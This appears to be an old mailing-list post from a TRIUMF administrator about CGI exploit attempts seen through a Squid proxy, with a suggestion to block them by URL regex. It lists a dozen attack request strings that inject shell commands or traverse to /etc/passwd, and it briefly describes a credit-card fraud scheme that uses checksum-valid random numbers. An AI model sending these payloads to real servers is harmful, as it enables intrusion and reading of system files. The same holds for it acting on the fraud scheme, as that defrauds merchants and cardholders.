Recently, I seem to be getting more and more CGI exploit attempts. One such came through a Squid at an educational institution. They reported 345 attempts to get /cgi-bin/aglimpse/80* ..... There seems to be a list somewhere of CGI exploits such as: /cgi-bin/phf?Qname=me%0als%20-lFa /cgi-bin/faxsurvey?ls%20-lFa /cgi-bin/handler/useless_shit;ls%20-lFa%20/etc|?data=Download /cgi-bin/webdist.cgi?distloc=;ls%20-lFa%20/etc/ /cgi-bin/php.cgi?/etc/passwd /cgi-bin/view-source?../../../../../../../../etc/passwd /cgi-bin/htmlscript?../../../../../../../../etc/passwd /cgi-bin/campas?%0als%20-lFa%20/etc /cgi-bin/info2www?`(../../../../../../../../ls%20-lFa%20/etc|)` /cgi-bin/aglimpse/80|IFS=X;CMD=lsX-lFaX/etc/;eval$CMD;echo /cgi-bin/pfdisplay.cgi?'%0Als%20-lFa%20/etc/' /_vti_pvt/service.pwd HTTP/1.0" I suggested to my correspondant that they might consider the URL regex features in Squid 2 to block such attempts. On a semi-related subject, I hear of schemes to generate sequences of random credit-card numbers, filter them through a checksum generator, then use them to attempt to buy time on sex sites. Such sites may not validate expiry dates or check names, require any corroborating ID etc. and may mail passwords to temporary or anonymous email addresses. Attempts may use public proxies to obfuscate the trail... cheers Deniable unless digitally signed Andrew Daviel, TRIUMF, Canada Tel. +1 (604) 222-7376 http://andrew.triumf.ca/andrew
